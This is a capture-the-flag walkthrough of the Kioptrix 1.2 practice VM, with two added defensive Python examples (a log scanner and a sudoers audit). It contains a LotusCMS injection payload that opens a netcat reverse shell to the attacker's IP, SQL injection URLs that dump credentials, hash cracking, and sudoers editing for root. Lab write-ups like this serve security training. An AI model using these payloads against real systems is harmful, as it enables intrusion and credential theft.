Kioptrix 1.2 (#3)

Description

According to the description supplied by the author himself:

Recon

After booting up the machine I had to find out what IP address it had been given by DHCP. In order to do that I ran a ping sweep over the entire subnet using nmap.

# nmap -sP 192.168.0.0/24 -n
-- snip --
Nmap scan report for 192.168.0.101
Host is up (0.00029s latency).
MAC Address: 00:0C:29:05:D6:2E (VMware)
-- snip --
# echo 192.168.0.101 kioptrix3.com >> /etc/hosts
# nmap kioptrix3.com -sT -sV -O
-- snip --
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
-- snip --

Low privilege shell

Low privileges can be acquired in more than one way. So far, I have found two ways:

Lotus CMS Remote Code Execution

The start page looks like some kind of CMS or blog engine. Indeed, the login page confirms it is LotusCMS.

[Image: LotusCMS login page]
index');${system('nc -e /bin/sh 192.168.0.103 443')};#
http://kioptrix3.com/index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2Fbin%2Fsh%20192.168.0.103%20443%27%29%7D%3B%23
[Image: Reverse shell]
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
# python -c 'import pty; pty.spawn("/bin/sh")'
# mysql -uroot -p
Enter password: fuckeyou
-- snip --
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| gallery            |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
-- snip --
Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+
7 rows in set (0.01 sec)
mysql> SELECT * FROM dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)

Gallarific SQL Injection

There is also a way of obtaining this information without an actual shell. In the Gallarific application I found a SQL injection vulnerability by adding an apostrophe character to the id parameter:

http://kioptrix3.com/gallery/gallery.php?id=1%27%20&sort=photoid#photos
[Image: SQL error after inserting apostrophe to parameter]
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6%20--&sort=photoid#photos
[Image: UNION’d values visible on the site]
http://kioptrix3.com/gallery/gallery.php?id=-1%20UNION%20SELECT%201,2,GROUP_CONCAT(table_name),4,5,6%20FROM%20information_schema.tables%20WHERE%20table_schema=database()--&sort=photoid#photos
[Image: List of tables from the server]
http://kioptrix3.com/gallery/gallery.php?id=-1%20UNION%20SELECT%201,2,group_concat(column_name),4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name=%27dev_accounts%27%20--&sort=photoid#photos
[Image: Dev_accounts column]
http://kioptrix3.com/gallery/gallery.php?id=-1%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20dev_accounts%20--&sort=photoid#photos
[Image: Credentials listed]
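As an added example (not part of the original write-up), a small Python scanner that flags both of the request patterns shown above, the LotusCMS code injection and the gallery.php injection, in Apache access-log lines. The log lines are constructed from the URLs in the write-up, and the integer-parameter check assumes gallery.php expects a numeric id, which the injection results suggest.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format, trimmed),
# modelled on the request URLs in the write-up; the last one is benign.
SAMPLE_LOG = """\
192.168.0.103 - - [01/Jan/2019:10:00:00 +0000] "GET /index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2Fbin%2Fsh%20192.168.0.103%20443%27%29%7D%3B%23 HTTP/1.1" 200 512
192.168.0.103 - - [01/Jan/2019:10:01:00 +0000] "GET /gallery/gallery.php?id=1%27%20&sort=photoid HTTP/1.1" 200 2048
192.168.0.103 - - [01/Jan/2019:10:02:00 +0000] "GET /gallery/gallery.php?id=-1%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20dev_accounts%20-- HTTP/1.1" 200 2048
192.168.0.50 - - [01/Jan/2019:10:03:00 +0000] "GET /gallery/gallery.php?id=7&sort=photoid HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# PHP code injection: a call such as system(...) or ${...(...)} in the decoded target
PHP_INJECT_RE = re.compile(r"system\s*\(|\$\{\s*\w+\s*\(", re.I)
# UNION-based extraction or schema enumeration anywhere in the decoded target
SQLI_RE = re.compile(r"\bUNION\b.*\bSELECT\b|information_schema", re.I | re.S)
# Parameters the application treats as integers (assumed); anything else in them is a probe
INT_PARAMS = {"/gallery/gallery.php": {"id"}}


def classify(line):
    """Return the names of the rules that fire on one access-log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    target = m.group(1)
    decoded = unquote(target)
    hits = []
    if PHP_INJECT_RE.search(decoded):
        hits.append("php-code-injection")
    if SQLI_RE.search(decoded):
        hits.append("sql-injection")
    parts = urlsplit(target)
    for name in INT_PARAMS.get(parts.path, ()):
        for value in parse_qs(parts.query, keep_blank_values=True).get(name, []):
            if not re.fullmatch(r"-?\d+", value.strip()):
                hits.append("non-integer-" + name)
    return hits


def scan(log_text):
    """Map 1-based line numbers of flagged requests to the rules that fired."""
    findings = {}
    for number, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings[number] = hits
    return findings
```

The first apostrophe probe carries no SQL keyword at all, so only the type check on id catches it; keyword matching alone would have missed the start of the attack.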

Privilege escalation

Credentials reversal

No matter how we obtained the credentials in the previous step, we still need to crack the password hashes. I pasted the hashes into a hashes.txt file on the attacker's machine and used hashcat to crack them:

# hashcat64.exe -m0 -a 0 hashes.txt rockyou.txt
-- snip --
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
-- snip --
# ssh loneferret@kioptrix3.com
-- snip --
loneferret@kioptrix3.com's password: starwars
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

Escalating privileges

On the victim machine I checked the /home directory. There is an interesting text file in loneferret’s folder:

# cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
ht
[Image: Opening file]
loneferret ALL=(ALL) ALL
[Image: Modified /etc/sudoers]
loneferret@Kioptrix3:~$ sudo bash
[sudo] password for loneferret: starwars
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# cd /root
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18
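As an added example (not part of the original write-up), a Python audit of sudoers rules that catches the policy abused above: an editor allowed through sudo can open and save /etc/sudoers itself, so the rule is equivalent to full root. The sudoers content is constructed, since the write-up does not show the original rule, and the path /usr/local/bin/ht is an assumption.

```python
import re

# Constructed /etc/sudoers content (the write-up does not show the original
# file): the ht rule is what the "sudo ht" policy implies (path assumed), the
# ALL rule is the line shown in the write-up after the editor was used.
SAMPLE_SUDOERS = """\
Defaults env_reset
root       ALL=(ALL) ALL
loneferret ALL=(root) NOPASSWD: /usr/local/bin/ht
loneferret ALL=(ALL) ALL
auditor    ALL=(root) sudoedit /etc/motd
"""

# Editors that, run as root, can open and save any file, /etc/sudoers included.
# "ht" is the one on this box; the others are common equivalents.
EDITORS = {"ht", "vi", "vim", "nano", "emacs"}
RULE_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # leading tags such as NOPASSWD:


def parse_rules(text):
    """Yield (user, runas, command, nopasswd) for every user rule in sudoers text."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = RULE_RE.match(line)
        if not line or line.startswith("Defaults") or not m:
            continue
        user, _host, runas, cmds = m.groups()
        for cmd in cmds.split(","):
            tags = TAG_RE.match(cmd.strip())
            cmd = cmd.strip()[tags.end():] if tags else cmd.strip()
            nopasswd = bool(tags and "NOPASSWD:" in tags.group(0))
            yield user, runas or "root", cmd, nopasswd


def audit(text):
    """Flag non-root users whose sudo rules amount to unrestricted root."""
    findings = []
    for user, runas, cmd, nopasswd in parse_rules(text):
        if user == "root" or cmd.startswith("sudoedit "):
            continue  # sudoedit edits a temporary copy; the editor never runs as root
        name = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
        if cmd == "ALL":
            findings.append((user, cmd, "unrestricted root"))
        elif name in EDITORS:
            why = "editor runs as %s: can rewrite /etc/sudoers" % runas
            findings.append((user, cmd, why + (" without a password" if nopasswd else "")))
    return findings
```

The sudoedit rule passes the audit because sudoedit lets the user edit one named file through a temporary copy, which is the right way to grant the "edit files" policy from CompanyPolicy.README.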

Summary

That’s it! We’ve rooted Kioptrix 1.2 ;) Even though the challenge required more steps than previous ones in the series, it was still quite easy. For me the biggest challenge was to learn how to use the ht application. The hack itself was quite straightforward. Bear in mind though that difficulty is very subjective with those :)
